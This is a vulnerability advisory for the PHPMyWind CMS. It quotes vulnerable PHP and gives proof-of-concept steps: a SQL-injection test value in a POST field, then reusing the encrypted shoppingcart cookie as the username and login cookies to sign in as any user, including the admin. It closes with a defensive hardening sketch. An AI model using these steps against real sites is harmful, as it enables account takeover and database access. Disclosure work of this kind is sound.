### Brief description:
PHPMyWind injection vulnerability & arbitrary user login
### Details:
member.php:
```
if(!empty($_COOKIE['username']) && // decrypt username from the cookie and assign it
   !empty($_COOKIE['lastlogintime']) &&
   !empty($_COOKIE['lastloginip']))
{
    $c_uname = AuthCode($_COOKIE['username']);
    $c_logintime = AuthCode($_COOKIE['lastlogintime']);
    $c_loginip = AuthCode($_COOKIE['lastloginip']);
}
else
{
    $c_uname = '';
    $c_logintime = '';
    $c_loginip = '';
}
// verify login state and that the user is valid
if($a=='saveedit' or $a=='getarea' or $a=='savefavorite' or
   $a=='delfavorite' or $a=='delcomment' or $a=='delmsg' or
   $a=='delorder' or $a=='avatar' or $a=='getgoods' or
   $a=='applyreturn' or $a=='perfect' or $a=='binding' or
   $a=='removeoqq' or $a=='removeoweibo')
{
    if(!empty($c_uname))
    {
        // 'guest' is the temporary user for one-click login before an account is bound
        if($c_uname != 'guest')
        {
            // as shown above, $c_uname is the decrypted cookie value, interpolated into the query unescaped
            $r = $dosql->GetOne("SELECT `id`,`expval` FROM `#@__member` WHERE `username`='$c_uname'");
```

shoppingcart.php:
```
if($a == 'addshopingcart')
{
    // build the selected attributes
    if(isset($typeid))
    {
        // parameter filtering
        $typeid = intval($typeid);
        // fetch product attributes
        $dosql->Execute("SELECT * FROM `#@__goodsattr` WHERE `goodsid`=$typeid");
        if($dosql->GetTotalRow() > 0)
        {
            echo 55555;
            // build the attribute string
            $goodsattr = array();
            while($row = $dosql->GetArray())
            {
                // selected attributes form the string
                if(isset($_POST['attrid_'.$row['id']]))
                {
                    $goodsattr[$row['id']] = $_POST['attrid_'.$row['id']]; // this value is attacker-controlled
                }
            }
            var_dump($goodsattr);
        }
        else
        {
            $goodsattr[$row['id']] = '';
        }
    }
    // initialise the shopping cart
    if(!empty($_COOKIE['shoppingcart']))
        $shoppingcart = unserialize(AuthCode($_COOKIE['shoppingcart']));
    else
        $shoppingcart = array();
    // store the selection in the array
    if(isset($goodsid) &&
       isset($buynum) &&
       isset($goodsattr))
    {
        // filter parameters
        $goodsid = intval($goodsid);
        $buynum = intval($buynum);
        $shoppingcart[] = array($goodsid, $buynum, $goodsattr);
    }
    var_dump($shoppingcart);
    // store in cookie
    // the cart contents are encrypted and stored in the cookie, so we can first use
    // $_POST['attrid_'.$row['id']] to write our injection payload, then rename the
    // resulting shoppingcart cookie to username to exploit it
    setcookie('shoppingcart', AuthCode(serialize($shoppingcart),'ENCODE'));
    echo TRUE;
    exit();
```
### Proof of vulnerability:
Test method
Open http://127.0.0.1/mywind/shoppingcart.php?typeid=10&a=addshopingcart&goodsid=1&buynum=1
POST attrid_1=sssss2'
PS: install the sample data when testing; all you need is one existing product ID.
Then make three copies of the shoppingcart cookie
and rename them to the three cookies member.php checks: username, lastlogintime and lastloginip.
Then open http://127.0.0.1/mywind/member.php?c=default and you are in.
Because AuthCode-decoded cookies are used in many places, once we have one encrypted value we can log in as any user; even the admin backend is verified the same way.
![cookie.png](https://images.seebug.org/upload/201405/14233527f89cce26df2f14f9bca8b8872cf8e13e.png)
![cookie2.png](https://images.seebug.org/upload/201405/14233539dabd85fc87eafeb71ddbdea0d7001dc8.png)
![inj_error.png](https://images.seebug.org/upload/201405/1423354711c40b503e4580f22010f9628e92f41d.png)
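As an added, defender-side illustration (not PHPMyWind's own code): the two root causes described above are that any AuthCode-encrypted cookie is accepted regardless of which cookie it was issued for, and that the decoded value is interpolated into SQL. The sketch below binds each sealed value to its cookie name under an HMAC, so a shoppingcart blob is refused as username, and uses a bound parameter for the member lookup; the key, table name and function names are assumptions.

```php
<?php
// Added hardening sketch, not PHPMyWind's own code. (1) Each protected cookie
// value is bound to the cookie name it was issued for and authenticated with
// an HMAC, so a sealed "shoppingcart" blob is rejected when presented as
// "username". (2) The member lookup binds the username as a parameter instead
// of interpolating it. Key, table name and helper names are demo assumptions.
const COOKIE_KEY = 'replace-with-a-long-random-per-site-secret';

function sealCookie(string $name, string $value, string $key): string
{
    // The cookie name is part of the authenticated payload.
    $payload = $name . "\0" . $value;
    $mac = hash_hmac('sha256', $payload, $key);
    return base64_encode($mac . "\0" . $payload);
}

function openCookie(string $name, string $sealed, string $key): ?string
{
    $raw = base64_decode($sealed, true);
    if ($raw === false) {
        return null;
    }
    $parts = explode("\0", $raw, 3);
    if (count($parts) !== 3) {
        return null;
    }
    [$mac, $boundName, $value] = $parts;
    $expected = hash_hmac('sha256', $boundName . "\0" . $value, $key);
    if (!hash_equals($expected, $mac)) {
        return null; // forged or tampered
    }
    if (!hash_equals($boundName, $name)) {
        return null; // genuine blob, but issued for a different cookie
    }
    return $value;
}

function findMember(PDO $db, string $username): ?array
{
    // `#@__` is PHPMyWind's runtime table-prefix placeholder; a plain name is used here.
    $st = $db->prepare('SELECT `id`, `expval` FROM `member` WHERE `username` = ?');
    $st->execute([$username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo with the report's test value: opening the cart blob under the
// username context is rejected, opening it under its own context succeeds.
$cart = sealCookie('shoppingcart', serialize([[1, 1, [1 => "sssss2'"]]]), COOKIE_KEY);
var_dump(openCookie('username', $cart, COOKIE_KEY));
var_dump(openCookie('shoppingcart', $cart, COOKIE_KEY));
```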